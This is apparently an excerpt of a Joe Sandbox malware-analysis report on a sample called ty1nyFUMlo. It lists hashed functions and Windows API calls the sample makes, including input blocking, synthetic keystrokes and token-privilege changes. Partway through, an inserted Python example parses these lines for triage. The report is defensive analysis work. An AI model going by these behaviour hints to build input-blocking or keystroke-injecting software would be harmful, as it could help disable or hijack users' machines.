                                                                                                                        • Instruction ID: ecd0645cbbe328e136bc984cf64a200a30c7cdb28f7f02806e61409061b09998
                                                                                                                        • Opcode Fuzzy Hash: 82bd4bc6b819be00dd79d5582f8343fdd539c6cf3c8a409646c44832efbf5928
                                                                                                                        • Instruction Fuzzy Hash: 2FE0B631000149ABCF11AF54DD09A593F69FB92785F104814FC059A132CB35ED46DE80
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: /
                                                                                                                        • API String ID: 0-2043925204
                                                                                                                        • Opcode ID: 9fb364bc48fa507a1570f00e0967a39e6cdf612500d40f85a340487188a7fcc7
                                                                                                                        • Instruction ID: fb6652b98a3781b2f5a12221a0e427bcc911ea91ff4d2165c1d4f8dfa6b6fc82
                                                                                                                        • Opcode Fuzzy Hash: 9fb364bc48fa507a1570f00e0967a39e6cdf612500d40f85a340487188a7fcc7
                                                                                                                        • Instruction Fuzzy Hash: 7E410376901219ABCB209EB9CC89EFB7FB8FBC4318F504669F905D7180E6709D818B50
                                                                                                                        APIs
                                                                                                                        • GetUserNameW.ADVAPI32(?,?), ref: 0056D28C
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: NameUser
                                                                                                                        • String ID: X64
                                                                                                                        • API String ID: 2645101109-893830106
                                                                                                                        • Opcode ID: 2f228e23243c86e7b0a3d14bb8becef993a5380fd53c8a845864ef320cfb6577
                                                                                                                        • Instruction ID: 34cacf5799088c056a9b5001acc38c10fcd8f24555b7ad87b395c2364a787781
                                                                                                                        • Opcode Fuzzy Hash: 2f228e23243c86e7b0a3d14bb8becef993a5380fd53c8a845864ef320cfb6577
                                                                                                                        • Instruction Fuzzy Hash: 84D0CAB880116DEACB94CBA0EC8CDDEBBBCBB15305F100A92F506A2040EB3496489F20
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                        • Instruction ID: fcaf572f7ff181801ed2caa820e665f338e686476372e5d8e27cefae35fad23e
                                                                                                                        • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
                                                                                                                        • Instruction Fuzzy Hash: E8020B72E002199BDF14CFA9C8906ADBFF5FF88314F25816AD819FB285D731AD418B94
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: Variable is not of type 'Object'.$p#^
                                                                                                                        • API String ID: 0-3707816926
                                                                                                                        • Opcode ID: 38ebca3518ea875ca29a7a756ba555f614a46d81e7587c365b77c3661e333c5d
                                                                                                                        • Instruction ID: 2807d7fc1836201bd9873582010fc7f00350088419aac3f565dcc528cbf25a3d
                                                                                                                        • Opcode Fuzzy Hash: 38ebca3518ea875ca29a7a756ba555f614a46d81e7587c365b77c3661e333c5d
                                                                                                                        • Instruction Fuzzy Hash: 1C32C030940219DFEF14DF90D885AEEBFB9FF45304F108459E806AB292D736AD86CB60
                                                                                                                        APIs
                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00586918
                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00586961
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: Find$CloseFileFirst
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 2295610775-0
                                                                                                                        • Opcode ID: e6c2e0ca8263addc36a6ca751e9337bcb197e074e1814221ff7d3751d7a85301
                                                                                                                        • Instruction ID: 92dfe15808c49cd0ccfba3780411d71d20029e8ed3f7a5579bcaf8d9de36e887
                                                                                                                        • Opcode Fuzzy Hash: e6c2e0ca8263addc36a6ca751e9337bcb197e074e1814221ff7d3751d7a85301
                                                                                                                        • Instruction Fuzzy Hash: D71190356042019FD710DF29D489A16BFE5FF89328F14C699E8699F7A2CB30EC45CB91
                                                                                                                        APIs
                                                                                                                        • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00594891,?,?,00000035,?), ref: 005837E4
                                                                                                                        • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00594891,?,?,00000035,?), ref: 005837F4
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ErrorFormatLastMessage
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3479602957-0
                                                                                                                        • Opcode ID: 5d17485d37c43069677baa574a1c4a16a3a15347ea22a6834d119a8776dc343d
                                                                                                                        • Instruction ID: a6f8d38a89109b4b3722f9ac3bc4949022bce98d14447c11d8e8f71cdf397620
                                                                                                                        • Opcode Fuzzy Hash: 5d17485d37c43069677baa574a1c4a16a3a15347ea22a6834d119a8776dc343d
                                                                                                                        • Instruction Fuzzy Hash: 7DF0EC706042152AE71067654C4DFDB3F9DFFC5B61F000175F905E2281D9609D48C7B0
                                                                                                                        APIs
                                                                                                                        • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0057B25D
                                                                                                                        • keybd_event.USER32(?,753DC0D0,?,00000000), ref: 0057B270
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: InputSendkeybd_event
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3536248340-0
                                                                                                                        • Opcode ID: d6c9a3098517764197ed367059a9a3fc2298711e6847290b8a8b1457c0d377f6
                                                                                                                        • Instruction ID: fa89f0b1796bb0ab1996e96e381df4b7cf9068d0bd5d1a0053f1d3c435a53079
                                                                                                                        • Opcode Fuzzy Hash: d6c9a3098517764197ed367059a9a3fc2298711e6847290b8a8b1457c0d377f6
                                                                                                                        • Instruction Fuzzy Hash: 8CF01D7580424DABEB059FA0D805BBE7FB4FF09309F008409F955A5192C3798615AF94
                                                                                                                        APIs
                                                                                                                        • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005711FC), ref: 005710D4
                                                                                                                        • CloseHandle.KERNEL32(?,?,005711FC), ref: 005710E9
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: AdjustCloseHandlePrivilegesToken
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 81990902-0
                                                                                                                        • Opcode ID: 9005e2f5a61d20b84e55e0179415a49c8394018d45fec87ef8c8283846fa8433
                                                                                                                        • Instruction ID: a9e1315f29f48ef04729aaa2af4eb85710bee989828662f9d1c3b48f999a4b77
                                                                                                                        • Opcode Fuzzy Hash: 9005e2f5a61d20b84e55e0179415a49c8394018d45fec87ef8c8283846fa8433
                                                                                                                        • Instruction Fuzzy Hash: 52E04F32004611AFE7252B11FC09E777FA9FF05310B10882EF4A6804B1DB626C90EB14
                                                                                                                        APIs
                                                                                                                        • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00546766,?,?,00000008,?,?,0054FEFE,00000000), ref: 00546998
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionRaise
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3997070919-0
                                                                                                                        • Opcode ID: 3357750c0ab2e6af0b31174f06c12230542f54d63663b26414352bf51180f7f7
                                                                                                                        • Instruction ID: e93db8e4fcc023ba353d75c78951ea72e99b9ec9bab419e8e81d22aa8d84caec
                                                                                                                        • Opcode Fuzzy Hash: 3357750c0ab2e6af0b31174f06c12230542f54d63663b26414352bf51180f7f7
                                                                                                                        • Instruction Fuzzy Hash: 22B15B31610609DFD719CF28C48ABA57FE0FF46368F258658E899CF2A2C335E991CB41
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 0-3916222277
                                                                                                                        • Opcode ID: c29aeaa10a3b8757eb0b3a25c3dba397e8bdc29f2395b5372918fb1970a2307d
                                                                                                                        • Instruction ID: 5c5ea13b49c66f16d1b63a57e8fba0a420e47a1751b90403a6d7de34746e4853
                                                                                                                        • Opcode Fuzzy Hash: c29aeaa10a3b8757eb0b3a25c3dba397e8bdc29f2395b5372918fb1970a2307d
                                                                                                                        • Instruction Fuzzy Hash: 06126F75A002299BDF14DF58D8806FEBBF5FF59310F14859AE849EB291DB309E81CB90
                                                                                                                        APIs
                                                                                                                        • BlockInput.USER32(00000001), ref: 0058EABD
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: BlockInput
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3456056419-0
                                                                                                                        • Opcode ID: 29d3f5c5edae03487e1152dba985bcaef45ea37853529fdc6d3b2e9f4fc4aa5f
                                                                                                                        • Instruction ID: e0f9a164f958f0ca17671cc39ec2c663608b09c8ba1b3d21dd89983a255078c8
                                                                                                                        • Opcode Fuzzy Hash: 29d3f5c5edae03487e1152dba985bcaef45ea37853529fdc6d3b2e9f4fc4aa5f
                                                                                                                        • Instruction Fuzzy Hash: EAE01A312002059FE710EF59D809E9ABFE9BF99760F008416FC49D7351DA70E8818B90
                                                                                                                        APIs
                                                                                                                        • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,005303EE), ref: 005309DA
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID: ExceptionFilterUnhandled
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 3192549508-0
                                                                                                                        • Opcode ID: b3f36f544b99d9c6b1559afa8afdcb790843ca92c1cb2ad20033261c2e6b4bd1
                                                                                                                        • Instruction ID: 6731236b3270fc932bb6af9d12ce81b37ddfd2a7c636efd81943a63c572f10a7
                                                                                                                        • Opcode Fuzzy Hash: b3f36f544b99d9c6b1559afa8afdcb790843ca92c1cb2ad20033261c2e6b4bd1
                                                                                                                        • Instruction Fuzzy Hash:
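The "APIs" entries in the function blocks above (GetLastError/FormatMessageW, SendInput/keybd_event, AdjustTokenPrivileges/CloseHandle, RaiseException, BlockInput, SetUnhandledExceptionFilter) all share one textual shape: `• Api.MODULE(arg,...), ref: ADDRESS`, with `?` standing for an argument the static pass could not resolve. The following is an added example by the editor, not code from the Joe Sandbox report or its signature engine. It parses those entries as pasted from this page, resolves hexadecimal arguments, flags the `BlockInput(00000001)` call as a TRUE (input disabled) invocation, and maps the APIs to behaviour hints. The `BEHAVIOUR_HINTS` table and all function names are the editor's own assumptions for triage, not part of Joe Sandbox's scoring.

```python
import re

# Lines copied verbatim from this report's "APIs" entries (the AutoIt runtime
# functions listed above). The parser and triage table below are an added
# example by the editor, not part of the Joe Sandbox report or its scoring.
REPORT_LINES = """\
• GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00594891,?,?,00000035,?), ref: 005837E4
• FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00594891,?,?,00000035,?), ref: 005837F4
• SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0057B25D
• keybd_event.USER32(?,753DC0D0,?,00000000), ref: 0057B270
• AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,005711FC), ref: 005710D4
• CloseHandle.KERNEL32(?,?,005711FC), ref: 005710E9
• RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00546766,?,?,00000008,?,?,0054FEFE,00000000), ref: 00546998
• BlockInput.USER32(00000001), ref: 0058EABD
• SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,005303EE), ref: 005309DA
"""

# One report entry: "• Api.MODULE(arg,arg,...), ref: ADDRESS"
API_RE = re.compile(
    r"^•\s*(?P<api>\w+)\.(?P<module>\w+)\((?P<args>.*)\),\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})$"
)

# Hypothetical triage table (editor's assumption, not Joe Sandbox's signature
# logic): what a call to each API suggests about the sample's behaviour.
BEHAVIOUR_HINTS = {
    "BlockInput": "blocks keyboard and mouse input while the caller runs",
    "SendInput": "injects synthetic keyboard/mouse events",
    "keybd_event": "injects synthetic keystrokes (legacy API)",
    "AdjustTokenPrivileges": "enables or disables privileges on an access token",
    "SetUnhandledExceptionFilter": "installs a top-level exception handler",
}


def parse_api_entries(text):
    """Return one dict per parsed API line; lines that do not match are skipped."""
    entries = []
    for raw in text.splitlines():
        m = API_RE.match(raw.strip())
        if not m:
            continue
        args = m.group("args").split(",") if m.group("args") else []
        entries.append({
            "api": m.group("api"),
            "module": m.group("module"),
            "args": args,
            # '?' marks an argument the static analysis could not resolve
            "unresolved": sum(1 for a in args if a == "?"),
            "ref": int(m.group("ref"), 16),
        })
    return entries


def arg_value(entry, index):
    """Resolved argument as an int, or None when the report shows '?' or a symbol."""
    if index >= len(entry["args"]):
        return None
    a = entry["args"][index]
    if a == "?" or not re.fullmatch(r"[0-9A-Fa-f]{8}", a):
        return None
    return int(a, 16)


def blocks_input(entry):
    """True for BlockInput(fBlockIt=TRUE): the sample disables user input."""
    return entry["api"] == "BlockInput" and bool(arg_value(entry, 0))


def triage(entries):
    """Map each API of interest to its behaviour hint and the call site(s) seen."""
    findings = {}
    for e in entries:
        hint = BEHAVIOUR_HINTS.get(e["api"])
        if hint is None:
            continue
        findings.setdefault(e["api"], {"hint": hint, "refs": []})
        findings[e["api"]]["refs"].append(f"{e['ref']:08X}")
    return findings


if __name__ == "__main__":
    parsed = parse_api_entries(REPORT_LINES)
    for api, info in sorted(triage(parsed).items()):
        print(f"{api:28s} {info['hint']}  @ {', '.join(info['refs'])}")
    for e in parsed:
        if blocks_input(e):
            print(f"BlockInput(TRUE) at {e['ref']:08X}: look for a matching BlockInput(FALSE)")
```

The `ref` addresses are module-relative to the 0x00510000 image base noted in each "Memory Dump Source" line, so they can be used directly as IDA/Ghidra jump targets on the dumped image. Arguments that the report shows as `?` are deliberately kept as unresolved rather than guessed, so a triage rule that needs a concrete value (such as the BlockInput flag) only fires when the static pass actually recovered it.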
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 0-4108050209
                                                                                                                        • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                        • Instruction ID: c72c856620d185eec990f30792e31fc344d2dd9885a31418fd5a459ee12330fe
                                                                                                                        • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
                                                                                                                        • Instruction Fuzzy Hash: EF516CF2E0C74E6BDB384568485E7BEAFC5BB5E340F180A49E982D7382C615DE01D355
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: 0&^
                                                                                                                        • API String ID: 0-2485633877
                                                                                                                        • Opcode ID: 5af71e68612727b4e5fa3f6dbadaf52ecfd76c5220cf684b171f7574932750c1
                                                                                                                        • Instruction ID: efdc774adaccca72eb9060afdade9a38d72b28871f9316ceea658329a6bf2281
                                                                                                                        • Opcode Fuzzy Hash: 5af71e68612727b4e5fa3f6dbadaf52ecfd76c5220cf684b171f7574932750c1
                                                                                                                        • Instruction Fuzzy Hash: DE21D5326206518BDB2CCE79C82767A77E9B7A4310F14862EE4A7D73D0DE75A904DB80
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                         • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                         • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 00957ae74aa333ff8c3dc43abd3739c771e98fcd8703cc6cbd7d3cb4f14d8e05
                                                                                                                        • Instruction ID: 538f5619cd2a7d3531932885f1cc1bcf4285ae1ba0609ecf9c2ad259a2c2a61d
                                                                                                                        • Opcode Fuzzy Hash: 00957ae74aa333ff8c3dc43abd3739c771e98fcd8703cc6cbd7d3cb4f14d8e05
                                                                                                                        • Instruction Fuzzy Hash: 28324431D28F054EDB639634C8223756A8DAFBB3C9F15C737E81AB59A6EB28D4835100
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 00000000.00000002.1369754497.0000000000511000.00000020.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                                                                                                                        • Associated: 00000000.00000002.1369702854.0000000000510000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005AC000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369818170.00000000005D2000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369922457.00000000005DC000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                        • Associated: 00000000.00000002.1369949610.00000000005E4000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_0_2_510000_ty1nyFUMlo.jbxd
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
